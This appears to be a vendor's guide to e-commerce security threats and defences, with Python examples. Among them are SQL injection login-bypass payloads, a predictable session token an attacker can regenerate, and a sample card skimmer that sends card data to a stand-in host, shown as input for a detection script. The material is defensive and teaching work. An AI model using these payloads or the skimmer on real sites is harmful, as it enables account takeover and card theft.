Before the growth of e-Commerce, traditional stores were targeted mainly through their Point of Sale systems and general cyber attacks. Today the security equation for the e-commerce sector is different and more complex. It is difficult to talk about security practices without discussing the security issues in the sector, so this article covers both; it is also a useful read if you are considering sourcing e-business or e-commerce security solutions to improve your business security. Customer data held by e-Commerce websites is critical not only for the sales and analytics teams but also valuable to threat actors. The terms online store, online retailer and e-Commerce business are used interchangeably throughout this article.
e-Commerce and drop shipping are profitable businesses that provide opportunities for big brands and benefit smaller retailers alike. Traditionally, a business is classified as B2C (business-to-consumer), B2B (business-to-business), C2B (consumer-to-business) or C2C (consumer-to-consumer); business-to-government (B2G) is usually grouped under B2B. Cyber security issues threaten all of these business types because they share the same elements: online transactions, websites and payment details.
The most valuable currency for an e-Commerce business is Trust.
Good e-Commerce website security preserves the three properties of the CIA triad:
- Confidentiality: consumer data is protected against unauthorised access
- Integrity: data is accurate and complete, and only changed by those authorised to change it
- Availability: data and the services that use it are accessible reliably and in a timely manner
A compromised website can have far-reaching consequences for both the business and its customers. To understand a business's e-Commerce website security requirements, it is important to analyse the security risks it is exposed to. Even the platforms that claim to be the most secure do not add any magic to your environment; ultimately it is your own effort, working with multiple parties, that builds a collective, layered set of measures to keep your data secure. When it comes to e-Commerce website security, almost every underlying component of the business tech stack is in play. Any component that is configured or managed loosely can be targeted over the internet and become a stepping stone into your production environment.
Pentesting, or security testing, of e-Commerce websites is often a forgotten area, usually rushed just before go-live. We explain the security threats to e-Commerce and how handling them early in the asset lifecycle helps businesses (online retailers and SaaS providers).
Why is cybersecurity critical for retail businesses?
During the pandemic, UK online sales showed record growth in May 2020, largely due to the closure of high street retail outlets, with online stores growing by 129.5% compared to May 2019.
Multiple warning signs can highlight fraud in your e-Commerce transactions. Potential fraud indicators include multiple payment methods used from a single IP address, mismatched or foreign billing and shipping addresses, and large-volume orders for a single item from new customers. On the engineering side, your development team may unintentionally introduce vulnerabilities when secure coding practices are skipped and urgent fixes crowd out important ones. 'Re-inventing the wheel' around critical aspects of an application, such as the session token generation algorithm or new logic in the registration process, can introduce vulnerabilities if the design is not validated by an independent party. Rather than preventing attacks, such risky practices may expose the business to worse security issues. It is therefore important to standardise the security approach by following trusted sources: the session handling built into your framework and vetted libraries rather than home-grown algorithms.
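As an added illustration of why a home-grown session token generator is dangerous (example code written for this article in Python, not code from any platform mentioned above): `weak_token` is a hypothetical generator that seeds a non-cryptographic PRNG from the login time, `is_predictable` plays the attacker who simply regenerates every candidate token around the victim's login second, and `strong_token` is the standard-library alternative that frameworks use. The timestamp and window are assumed values.

```python
import hashlib
import random
import secrets


def weak_token(issued_at):
    """Hypothetical home-grown session token (constructed for this example).

    It seeds Python's non-cryptographic Mersenne Twister with the issue time
    in whole seconds, so anyone who can narrow down *when* a session was
    created can regenerate the token exactly.
    """
    rng = random.Random(issued_at)
    return hashlib.sha256(str(rng.getrandbits(128)).encode()).hexdigest()


def attacker_candidates(guessed_time, window=30):
    """Every weak token that could have been issued within +/- window seconds."""
    return {weak_token(t) for t in range(guessed_time - window, guessed_time + window + 1)}


def is_predictable(token, guessed_time, window=30):
    """True if the token falls inside the attacker's regenerated candidate set."""
    return token in attacker_candidates(guessed_time, window)


def strong_token():
    """Framework-style token: 32 bytes from the OS CSPRNG, URL-safe encoded."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    issue_time = 1_700_000_000           # the victim's real login second (assumed)
    victim = weak_token(issue_time + 7)  # attacker's estimate is 7 s off
    print(is_predictable(victim, issue_time))          # True: token recovered
    print(is_predictable(strong_token(), issue_time))  # False
```

The attacker does not need the source code to be leaked: a time-seeded generator has at most a few thousand plausible outputs per hour, so an authenticated session can be hijacked by brute force against the cookie value alone.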
The lifecycle of any e-Commerce sale depends on the internet, the consumer's payment and the retailer's website. All three are entry points for cyber-criminals launching attacks against e-Commerce. Consumers are targeted with phishing emails that steal payment information, because their internet presence (social media, emails, phone numbers) makes them easy to reach; this vector rises sharply during peak shopping seasons. Cybercriminals find e-Commerce websites desirable because online retailers act as 'watering holes' for unsuspecting victims. Overall, card skimming attacks, Point of Sale malware and phishing are the top three e-Commerce security issues.
The biggest e-Commerce security issues
The following cybersecurity issues are among the top security vulnerabilities affecting retail and e-Commerce businesses. The attack vector varies with the business's exposure and does not necessarily target the website itself: security challenges in e-commerce can involve the business's employees, third parties (payment, hosting, network and/or equipment providers) or customers. A few threats that are important but not covered in depth here include insider threats, payment gateway security and hosting provider compromises. This post covers the types of e-commerce security and the associated vulnerabilities around clients, servers and the communication between them.
Web and mobile application vulnerabilities
e-Commerce website security issues rank at the top of a CxO's mind. Web and mobile applications are an attractive target for cybercriminals and pose one of the biggest e-Commerce security issues. Attackers find it economically viable to target many websites at once using bots and automated scripts to siphon off payment details. With the increased use of mobile applications, consumers are at greater risk from vulnerable apps. Common issues in websites include SQL injection, malicious iframe injection, cross-site scripting (XSS) and brute-force attacks on logins. Checkout hijacking disrupts many e-Commerce businesses by redirecting customers to a fake shopping cart or payment form that captures their payment information. These are the types of risks typically picked up during technical security assessments as part of our e-Commerce security services.
In this app-driven world, we consume more and more data via APIs, which keep processing times fast. API security risks are on the rise due to insecure deployment practices, and development teams need to understand the risks and their mitigations so that security practices are actually applied. Web, mobile and API security in online retail is therefore the most critical component in offering customers a safe and secure experience.
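To make the SQL injection point above concrete, here is an added example (written for this article in Python with an in-memory SQLite table; it is not code from any platform or API the article names): `login_vulnerable` builds the query by string formatting, exactly the mistake behind most injection findings in custom login and search code, while `login_safe` uses a parameterised query. The `users` table, the `alice` account and the two payloads are constructed for the demonstration.

```python
import sqlite3


def build_demo_db():
    """In-memory user table with one constructed account (example data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'hash-of-alices-password')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password_hash):
    """Builds SQL by string formatting: user input becomes SQL syntax."""
    query = (
        "SELECT COUNT(*) FROM users WHERE username = '%s' AND password_hash = '%s'"
        % (username, password_hash)
    )
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn, username, password_hash):
    """Parameterised query: the driver sends values separately from the SQL,
    so a quote or comment sequence in the input is just data."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password_hash = ?"
    return conn.execute(query, (username, password_hash)).fetchone()[0] > 0


# Two classic payloads. The first comments out the password check for a
# known account; the second makes the WHERE clause true for any row.
BYPASS_ACCOUNT = "alice' --"
BYPASS_ANY = "' OR 1=1 --"


def demo():
    """Runs both payloads against both implementations and returns the outcomes."""
    conn = build_demo_db()
    return {
        "vulnerable_bypass_account": login_vulnerable(conn, BYPASS_ACCOUNT, "wrong"),
        "vulnerable_bypass_any": login_vulnerable(conn, BYPASS_ANY, "wrong"),
        "safe_same_payload": login_safe(conn, BYPASS_ACCOUNT, "wrong"),
        "safe_real_login": login_safe(conn, "alice", "hash-of-alices-password"),
    }


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```

The same rule applies to ORMs and to APIs that accept filter or sort parameters: anything that reaches the query text unbound is injectable, regardless of how the request arrived.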
Moreover, we have come across several small e-Commerce businesses that had been compromised without knowing it, only finding out when search engines such as Google started blocking their users' access to the infected website. e-Commerce platforms play a big part in the security landscape because traditional CMS products were built without security baked into their core. Security as an afterthought amounts to patching things up to avoid breaking them further, at the risk of introducing more risks. It goes without saying that business-as-usual (BAU) security assessment, such as e-Commerce penetration testing, source code reviews and infrastructure security reviews, should be high on the agenda.
You may find it reassuring that using a payment gateway lessens your security burden. That is true for the payment processing itself, but your website still handles the customer's input before the transaction and the data returned after it. Given the parameters exchanged in these requests before control passes to the external party (third-party payment gateways such as Stripe, PayPal, Square, Shopify Payments, Opayo, etc.), it is important to ensure your setup handles that data, and its security and privacy, in line with good security practice.
Card skimming attacks are among the most popular criminal activities affecting e-Commerce as an industry. A surprising number of businesses fall victim to these campaigns simply because they lack a proactive retail cybersecurity approach. A specific example related to popular e-Commerce platforms is Magecart. Magecart attacks are online credit card skimming attacks in which attackers took a shotgun approach to mass compromise, injecting JavaScript skimmers into the checkout pages of Magento websites (the name combines Magento and cart); the skimmer reads the card fields as the customer submits them and sends a copy to an attacker-controlled host. Variations then evolved into further compromises of Magento, OpenCart and osCommerce platforms, so much so that the criminal groups behind Magecart made Wired magazine's 2018 'most dangerous people' list. As with other open-source software, the ability to edit your source code and make versions suited to your platform can introduce security vulnerabilities. This customisation comes at a price: finding the right balance between in-house control of the code and cybersecurity is a delicate business.
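Because a skimmer has to live in the checkout page, the cheapest proactive check is to audit what scripts that page actually loads. The following added example (Python, written for this article; not Magecart's code nor any platform's own tooling) parses a checkout page, flags external scripts from hosts outside an assumed allow-list, reports cross-origin scripts without Subresource Integrity, and flags inline scripts that both touch card fields and contain an exfiltration primitive. `ALLOWED_SCRIPT_HOSTS`, the field-name patterns and the sample page are all constructed assumptions for the demonstration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed allow-list for a hypothetical shop: its own origin plus the
# payment provider's script host. Adjust to your real checkout page.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "js.stripe.com"}

# Field names a skimmer typically reads, and primitives it uses to exfiltrate.
CARD_FIELDS = re.compile(r"(cc[_-]?number|card[_-]?number|cvv|cvc|expiry)", re.I)
EXFIL = re.compile(r"(new\s+Image|fetch\s*\(|XMLHttpRequest|sendBeacon|\.src\s*=)", re.I)


class ScriptCollector(HTMLParser):
    """Collects external script sources and inline script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.external = []   # (src, has_sri)
        self.inline = []     # inline script bodies
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        attrs = dict(attrs)
        if attrs.get("src"):
            self.external.append((attrs["src"], "integrity" in attrs))
        else:
            self._current = []

    def handle_data(self, data):
        if self._current is not None:
            self._current.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._current is not None:
            self.inline.append("".join(self._current))
            self._current = None


def audit_checkout(html, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Returns a list of (finding, detail) tuples for a checkout page."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for src, has_sri in parser.external:
        host = urlparse(src).netloc.lower()
        if not host:                      # relative URL: same origin
            continue
        if host not in allowed_hosts:
            findings.append(("untrusted-script-host", src))
        elif not has_sri:
            findings.append(("missing-sri", src))
    for body in parser.inline:
        if CARD_FIELDS.search(body) and EXFIL.search(body):
            findings.append(("inline-skimmer-pattern", body.strip()[:60]))
    return findings


# Constructed sample page: a same-origin script, the payment provider's
# script, a script pulled from an unknown host, and an inline skimmer that
# beacons the card fields to that host on submit.
SAMPLE_CHECKOUT = """
<html><body>
<script src="/static/checkout.js"></script>
<script src="https://js.stripe.com/v3/"></script>
<script src="//cdn-stats.example.net/analytics.js"></script>
<script>
document.querySelector('form').addEventListener('submit', function () {
  var d = { n: document.getElementById('cc_number').value,
            c: document.getElementById('cvv').value };
  new Image().src = 'https://cdn-stats.example.net/c?' + btoa(JSON.stringify(d));
});
</script>
</body></html>
"""

if __name__ == "__main__":
    for finding in audit_checkout(SAMPLE_CHECKOUT):
        print(finding)
```

Run this against a stored copy of your own checkout HTML on every deploy and on a schedule; a new host appearing in the `untrusted-script-host` findings is exactly the signal a Magecart compromise produces. A Content Security Policy with a `script-src` allow-list turns the same list into a browser-enforced control.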
Point of Sale Attacks
Point of Sale malware hit the mainstream media when the American retail giant Target was breached due to a basic network segmentation error. Cybercriminals uploaded malware onto Point of Sale (PoS) systems that stole card data from cash registers using keyloggers and RAM scrapers, affecting millions of consumers. A PoS compromise delivers instant results for threat actors; it is a lucrative attack vector that feeds credit card data onto dark web markets.
What was previously a tick-in-the-box activity now requires a proactive approach to data security. Compliance and regulation (SOX, HIPAA, PCI DSS) have introduced stringent requirements in line with the increase in malicious activity.
Insecure patch management is an e-Commerce security vulnerability because exploits for known flaws are freely available in the wild. It is important to keep software updated to the latest stable version, so that bug fixes, performance improvements and security fixes are deployed promptly and the attack surface of the e-Commerce website is minimised. Take Magento version 1 as an example: support for Magento Commerce 1 and Magento Open Source 1 reached end of life on 30th June 2020. When software reaches end of life, it means:
- No active support is available for the software.
- The vendor will not address security vulnerabilities.
Together these lead to a lack of updates for third-party integrations, compatibility issues, bugs and effectively degraded performance for the e-Commerce website, while publicly known exploits add to the security threats.
Vulnerable Third-party Modules
Vulnerable third-party extensions introduce bugs that can compromise the core platform, whether WordPress, Magento, OpenCart or another. The most important thing with third-party extensions is to keep up with the latest releases. Some modules are developed without secure coding practices and have no formal security support; the result is backward-incompatibility issues and bugs papered over with shortcut fixes.
Ransomware is a targeted approach that takes control of the victim's website, systems or networks and locks (encrypts) the files until a ransom is paid to the attacker. It remains one of the biggest cyber security issues today. You can never be sure that paying would actually decrypt the affected files, hence the perennial question 'Should you pay the ransom?': you may be targeted again, or the data may not be decrypted, and you lose either access or sensitive data. Malware and ransomware protection is one of the most important aspects of a retail cybersecurity strategy. Simply put, it is an expensive problem to have.
Compliance security risks
A lack of security patches may lead to a breach of PCI DSS compliance, falling squarely under 'Requirement 6: Develop and Maintain Secure Systems and Applications'. PCI DSS is about the safety of cardholder data, including customer records and personal information, and requires that stored card numbers are rendered unreadable (for example by strong encryption) and that cardholder data is encrypted in transit over public networks. You may like our guide on how to achieve PCI compliance if you prefer the self-help route.
For example, the PCI DSS standard explicitly states how penetration testing and vulnerability scanning must be carried out to maintain compliance. Similarly, it states how segmentation affects which systems and networks are in scope for PCI DSS compliance purposes:
“Network segmentation of, or isolating (segmenting), the cardholder data environment from the remainder of an entity’s network is not a PCI DSS requirement. However, it is strongly recommended as a method that may reduce:
- The scope of the PCI DSS assessment
- The cost of the PCI DSS assessment
- The cost and difficulty of implementing and maintaining PCI DSS controls
- The risk to an organization (reduced by consolidating cardholder data into fewer, more controlled locations)
Without adequate network segmentation (sometimes called a “flat network”), the entire network is in the scope of the PCI DSS assessment.”
e-Commerce Privacy issues
GDPR states that any business processing the personal data of individuals in the EU that experiences a data breach must notify the supervisory authority within 72 hours or risk heavy penalties. For this class of infringement GDPR sets fines of up to 2% of global annual turnover or up to 10 million euros, whichever is higher (the upper tier, for the most serious infringements, reaches 4% or 20 million euros). Several high-profile businesses have already been fined under GDPR, including Marriott International (€20 million), Google (€50m), British Airways (€21m) and H&M (€35m). Data privacy, especially how prepared a business is to decide when and how to report a breach, is at the forefront of security challenges in the e-Commerce sector irrespective of business size.
ISO/IEC 27001:2013 penetration testing covers the technical controls involved in an organisation's risk management and reduces information security and data protection risks. This supports maintenance of the ISMS (Information Security Management System) and provides the evidence needed for ISO 27001 certification.
Insufficient Logging and Monitoring
Insufficient logging and monitoring is in the OWASP Top Ten list of risks affecting web applications. Most attacks start with initial probing, often by automated scripts or scanning software. A lack of logging and monitoring encourages threat actors to escalate their attempts to more intrusive levels without fear of being blocked or caught, and a lack of event logging at the necessary level complicates incident response when an attack does occur.
A retail cybersecurity strategy without sufficient logging and monitoring controls gives intruders longer dwell time in the network and complicates post-incident investigations. Without audit events, it is almost impossible to work out what information was at play, who misused it, how likely further attacks are and what the appropriate mitigations would be.
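The probing described above is visible in ordinary web server access logs if anyone looks. As an added example (Python, written for this article; the log lines, IP addresses and login paths are constructed, not real traffic), `detect` reads combined-format access log lines and raises two kinds of alert: a burst of POSTs to a login endpoint from one IP inside a sliding window, and an IP racking up 404s, which is what content enumeration and vulnerability scanners look like. The `LOGIN_PATHS` set is an assumption for the stacks the article mentions; adjust it to your own admin URLs.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Combined log format line: ip ident user [time] "METHOD path proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# Login endpoints for common e-Commerce stacks (assumed paths for this example).
LOGIN_PATHS = {"/wp-login.php", "/admin/", "/customer/account/loginPost/"}


def parse_line(line):
    """Returns (ip, timestamp, method, path, status) or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return m["ip"], ts, m["method"], m["path"], int(m["status"])


def detect(lines, login_threshold=5, window_seconds=60, notfound_threshold=10):
    """Flags (a) login POST bursts per IP inside a sliding time window and
    (b) IPs generating many 404s, the signature of content enumeration.
    Each (kind, ip) pair is reported once, with the count at trigger time."""
    login_times = defaultdict(deque)
    notfound = defaultdict(int)
    alerts, seen = [], set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path, status = rec
        if method == "POST" and path in LOGIN_PATHS:
            q = login_times[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()          # drop attempts that fell out of the window
            if len(q) >= login_threshold and ("login-bruteforce", ip) not in seen:
                seen.add(("login-bruteforce", ip))
                alerts.append(("login-bruteforce", ip, len(q)))
        if status == 404:
            notfound[ip] += 1
            if notfound[ip] >= notfound_threshold and ("enumeration", ip) not in seen:
                seen.add(("enumeration", ip))
                alerts.append(("enumeration", ip, notfound[ip]))
    return alerts


def _line(ip, ts, method, path, status):
    """Formats one constructed combined-format log line."""
    return '%s - - [%s] "%s %s HTTP/1.1" %d 512 "-" "Mozilla/5.0"' % (ip, ts, method, path, status)


# Constructed sample log: one IP hammers wp-login.php, one customer logs in
# normally, and one IP probes for common admin and backup paths.
SAMPLE_LOG = [
    _line("203.0.113.5", "10/Oct/2023:13:55:%02d +0000" % s, "POST", "/wp-login.php", 200)
    for s in (1, 4, 8, 11, 15, 20)
] + [
    _line("198.51.100.7", "10/Oct/2023:13:55:10 +0000", "POST", "/wp-login.php", 302),
] + [
    _line("203.0.113.9", "10/Oct/2023:13:56:%02d +0000" % i, "GET", p, 404)
    for i, p in enumerate(["/phpmyadmin/", "/.env", "/backup.zip", "/admin.php",
                           "/wp-config.php.bak", "/.git/config", "/xmlrpc.php",
                           "/shell.php", "/config.php~", "/db.sql"])
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The thresholds are deliberately conservative so the rule can run unattended; the point is not the numbers but that both patterns are only detectable if request method, path and status are being logged and someone, or something, is reading them.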
DoS and DDoS Attacks
Denial of Service is a cyber-attack that renders the website unusable for legitimate users. A distributed denial of service (DDoS) attack can be thought of as a gang of bots (a botnet) hitting the target with constant traffic, far more than the target can handle. Without relevant controls, DDoS attacks expose gaps in the business resilience strategy and cause operational disruption. This is an especially important issue to mitigate ahead of peak sales periods.
Best practices for e-Commerce security
We often have to answer the question 'What is good e-commerce security?'. One size does not fit all, because the technology stack, business objectives and budget all shape both the challenges and the solutions. You must know your security issues before you can start solving the puzzle; this means a thorough pen test or security review to identify the gaps, analyse the risks and decide on the risk treatment options.
As in the shared responsibility model of the cloud and other areas, security compliance, secure configuration and management remain the customer's responsibility. Although this cyber security checklist for retail businesses is offered as groundwork, these practices are also concrete steps towards compliance and regulatory requirements such as a PCI compliance audit, GDPR and ISO 27001. In cloud environments the methods differ according to the assets and the deployment model (on-prem, hybrid or fully private cloud), but the cybersecurity fundamentals for an e-Commerce business remain the same. In any case, working through this checklist provides solid ground for protection against cyber attacks.
Bare basics – reducing the impact
- Stay away from cybersecurity solutions that offer a one-solution approach. Whenever anyone promises 100% security for your business, it is best to avoid the argument and move on to the next task in your schedule. Such offers are not just too good to be true; they also mark you out as a soft target for an easy sell. Sorry, that's the truth! We have multiple stories of CTOs and CIOs who bought into IT managed service providers (MSPs) 'taking care of' cybersecurity in their organisation, only to find out post-compromise that this was never agreed on paper nor delivered in substance.
- Sign up for security alerts from your vendors; they are the most authoritative source for the latest changes, alerts and software updates.
- Use separate credentials for privileged tasks, distinct from regular staff logins.
- Ensure secure backups are taken routinely. Randomly audit and test backup restores so that they work when you need them.
- Do not spend on high-fee consultancies where basic hardening can be done without large investments of time and money. This includes using security plugins from trusted parties offered on the WordPress and other CMS plugin stores, changing the default administrator username to something difficult to guess, and using strong, randomly generated, non-dictionary passwords.
- Enforce the use of SSL/TLS encryption. This is easy to install and configure: in WooCommerce, for example, it is WooCommerce > Settings > Enable 'Force Secure Checkout'. On Magento Commerce Cloud you may need to wait a few hours, depending on the hosting provider's support ticket process.
- Undertake regular in-depth security assessments, such as our e-Commerce penetration testing for applications, to identify vulnerabilities affecting web applications, APIs and mobile applications. Web, mobile and API security threats are among the most dangerous risks to your business.
- Keep multiple backups at secure sites.
- Use distributed denial of service (DDoS) protection services, which are designed to help against attacks and also improve website performance.
- If short on security resources, arrange for continuous security scanning through managed security services that give you regular updates on whether your attack surface is shrinking or expanding over time. New threats, including cloud security risks, are then dealt with promptly, avoiding long exposure windows for attackers.
Ensure that hosting providers actually demonstrate a proactive approach towards security issues in the e-Commerce sector rather than just 'selling' it on sales calls or in marketing campaigns. For example, the security measures built into BigCommerce, WooCommerce, Magento or WordPress are not sufficient on their own, and you need a reliable and reputable hosting provider to add safety and security to your e-Commerce business. This can be judged from the practices they follow; a quick, sure-fire way to find out whether their cybersecurity approach is proactive is to:
- Ask what retail cybersecurity assurance exercises they perform and how often they do them for their platform.
- Ask for a technical report evidencing their annual or more frequent security assessments.
- Check whether their developers follow secure coding practices and which standards they adhere to during development.
- Ask for examples of how they have previously supported the security of customers' websites or handled security incidents on them.
- Do not rest on the assumption that because your e-Commerce site is hosted on Amazon, Azure or another cloud provider, security is taken care of. You have to provision your own e-Commerce security services to continuously identify and mitigate risks and keep your website users safe.
- Deploy jump boxes that act as a middle layer between the corporate environment (where staff are located or connected) and the production environment (where the website is hosted). Jump boxes are securely hardened systems hosted in a DMZ or private cloud that provide controlled access to production systems, so that access is granted on a need-to-know basis without exposing the production environment. Check jump boxes against secure hardening practices to ensure no breakout opportunities exist and to minimise insider threats.
- Mandate the use of password managers for all staff, ensure they do not reuse passwords between corporate and production environments, and implement separate domain security policies.
Network Segmentation
This is one of the most effective and (mostly!) cheapest controls, needing no significant resources. Segmenting networks reduces the risk of compromise by making it harder for an attacker to reach information spread across more than one place in the organisation. For example, segmentation can separate sensitive information stored in a database from segments containing users' workstations, network equipment or other organisations' digital assets. By implementing access restrictions at the network level, segmentation keeps internal exposure to a minimum. Network segmentation is also one of the core elements of PCI DSS scoping and of how access is managed between in-scope systems and networks.
Enabling multi-factor authentication at checkpoints such as server access and website administrative panels adds an extra layer of protection. Think of it as adding difficulty for threat actors: even with a compromised password, they are not allowed in without the one-time code used as the second factor.
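To show what that one-time code actually is, here is an added example (Python, written for this article; it is not code from any MFA product) implementing the time-based one-time password that authenticator apps generate, following RFC 4226 (HOTP) and RFC 6238 (TOTP). The verifier tolerates one step of clock drift and refuses any counter it has already accepted, which is the detail that stops a phished or sniffed code being replayed. The secret is the RFC 6238 test secret; a real deployment generates a random one per user.

```python
import base64
import hashlib
import hmac
import struct
import time


def hotp(secret, counter, digits=6):
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret, at_time, step=30, digits=6):
    """RFC 6238 TOTP: HOTP with the counter derived from Unix time."""
    return hotp(secret, int(at_time // step), digits)


def verify_totp(secret, code, at_time, step=30, skew=1, last_counter=None):
    """Verifies a submitted code, tolerating `skew` steps of clock drift and
    refusing any counter at or before the last accepted one (replay guard).
    Returns (accepted, counter_to_store); persist the counter per user."""
    if not code.isdigit():
        return False, last_counter
    counter = int(at_time // step)
    for c in range(counter - skew, counter + skew + 1):
        if last_counter is not None and c <= last_counter:
            continue  # already used (or older): a captured code cannot be replayed
        if hmac.compare_digest(hotp(secret, c, len(code)), code):
            return True, c
    return False, last_counter


def provisioning_secret(secret):
    """Base32 form of the shared secret, as typed or QR-scanned into an app."""
    return base64.b32encode(secret).decode().rstrip("=")


# RFC 6238 Appendix B test secret for SHA-1 (ASCII "12345678901234567890").
RFC_SECRET = b"12345678901234567890"

if __name__ == "__main__":
    print(provisioning_secret(RFC_SECRET))
    print(totp(RFC_SECRET, time.time()))  # the live 6-digit code for this secret
```

Note that the shared secret is as sensitive as a password: store it encrypted or in an HSM-backed service, never in the same table as the password hash in clear, and rate-limit verification attempts, because a 6-digit code with a 3-step window is guessable by brute force if unlimited tries are allowed.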
Third Party Extensions
This is one of the most common threats facing e-Commerce websites. Install extensions from trusted sources only. DO NOT use 'nulled' paid extensions from P2P or torrent websites, and do not install any extension or software from links in suspicious emails. Ask for advice on trusted extensions from any security experts you liaise with; we are happy to provide free advice. Similarly, any internal APIs or dashboards integrated with the website must be thoroughly reviewed. With online stores, warehouse solutions are often integrated with both the corporate environment and the website without due diligence on the solution in use.
Secure Hardening Tips
- Never mix and match components between the corporate and production environments; one environment can act as a bridge for threat actors to attack the other. For example, a retailer's office-based and remote web development and marketing teams support the company website hosted in the data centre's production environment, with direct access to the website via FTP, SSH, RDP and the CMS so they can transfer data quickly whenever required. If a marketing employee's laptop is compromised via social engineering or phishing, the threat actor has a direct route into the website's administrative access, which could be exploited for defacement, information theft or worse. Implementing a jump box, with secure hardened baselines defined for its users, makes this scenario much harder for threat actors to exploit.
- Ensure that secure communication protocols are used and configured properly: for example, SSH should use key- or certificate-based authentication rather than passwords, and any sensitive material (passcodes, keys, PINs, passwords) should be stored in password managers. Disable FTP and all other clear-text channels in favour of their secure equivalents (SFTP, SSH, HTTPS).
- Follow secure hardening practices on the underlying stack, such as limiting access to cron.php, patch management, and build configuration reviews of the database, PHP and memory caching systems. Refer to our e-Commerce cybersecurity service offerings if you require an independent evaluation.
- Restrict access to admin and other non-customer areas of the website to trusted IP addresses only. This includes SSH ports, the CMS panel and all administrative and management interfaces.
- Periodically review permissions on all directories that could pose a data leakage threat. In cloud security terminology, insecure S3 bucket configurations in AWS are associated with bucket data leaks leading to data theft; in the traditional sense, the equivalent is a directory listing or insecure permissions vulnerability.
Web Application Firewall
Use a Web Application Firewall (WAF) to filter out unnecessary noise such as bots, protect against brute-force attacks and enumeration of admin pages and related content, and discover and block suspicious patterns. Modern content delivery networks offer caching, DoS protection and a WAF under the same banner, providing peace of mind and protection against attacks on online stores.
Encryption
Encryption is more than a certificate on a website; it is about ensuring that data at rest and data in transit are secure. It is considered one of the more complex security challenges in e-Commerce because few teams have the depth of skill needed to configure encryption securely.
Data in transit relates to securing the transport channel (HTTPS, i.e. HTTP over TLS). A properly configured SSL/TLS certificate gains user trust and is required for PCI compliance. Data at rest relates to securing data such as card numbers and personal information stored in a database. Privacy regulations (GDPR, DPA 2018, California Consumer Privacy Act) apply to businesses depending on their location and processing activities, and must be followed to avoid fines. Do not store sensitive information unless it is necessary for business purposes: identify a customer by username and password rather than by their National Insurance or Social Security number, and if such PII (Personally Identifiable Information) is not needed, do not collect it. Where passwords must be stored, do not encrypt them; use a slow, one-way password hash with a per-user salt. Salting adds random data to each password before hashing so that two users with the same password still get different hash outputs, which defeats precomputed (rainbow table) attacks and hides which accounts share a password.
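The password storage advice above in working form, as an added example written for this article (Python standard library only; not code from any platform named here): `hash_password` produces a self-describing record with a fresh 16-byte salt and PBKDF2-HMAC-SHA256, `verify_password` recomputes and compares in constant time and rejects malformed records instead of raising, and `needs_rehash` lets you raise the work factor over time by re-hashing on the next successful login. The iteration count follows current OWASP guidance for PBKDF2-SHA256; the record format is an assumption for this example.

```python
import base64
import hashlib
import hmac
import os

ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 600_000          # current OWASP guidance for PBKDF2-HMAC-SHA256
SALT_BYTES = 16


def hash_password(password, iterations=ITERATIONS):
    """Returns a self-describing record: algorithm$iterations$salt$hash.

    A fresh random salt per user means two users with the same password get
    different records, so a leaked table cannot be attacked with one
    precomputed table and equal passwords are not visible."""
    salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "$".join([
        ALGORITHM,
        str(iterations),
        base64.b64encode(salt).decode(),
        base64.b64encode(digest).decode(),
    ])


def verify_password(record, password):
    """Recomputes the hash with the stored salt and compares in constant time.
    Malformed records are rejected rather than raising."""
    try:
        algorithm, iterations, salt_b64, digest_b64 = record.split("$")
        if algorithm != ALGORITHM:
            return False
        iterations = int(iterations)
        salt = base64.b64decode(salt_b64)
        expected = base64.b64decode(digest_b64)
    except (ValueError, TypeError):
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return hmac.compare_digest(candidate, expected)


def needs_rehash(record):
    """True if the record was made with fewer iterations than current policy,
    so it should be re-hashed on the user's next successful login."""
    try:
        algorithm, iterations, _, _ = record.split("$")
        return algorithm != ALGORITHM or int(iterations) < ITERATIONS
    except ValueError:
        return True


if __name__ == "__main__":
    a = hash_password("correct horse battery staple")
    b = hash_password("correct horse battery staple")
    print(a != b)                                              # True: different salts
    print(verify_password(a, "correct horse battery staple"))  # True
    print(verify_password(a, "Tr0ub4dor&3"))                   # False
```

Card numbers are the opposite case: they must be recoverable for refunds and recurring payments, so they are never hashed like this; keep them out of your database altogether by tokenising through the payment gateway, which also shrinks PCI DSS scope.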
Logging and Monitoring
Review the auditing levels for applications, APIs and underlying components and ensure that the necessary event types are logged with sufficient detail for investigation. For instance, input validation failures, access control failures and related events should be logged with the user context (who, from where, against what). Logging everything runs the risk of high-volume logs that pose analysis and storage challenges, so the right balance should be defined and reviewed against the audit trail and incident response plans.
Have a data breach response plan HANDY!
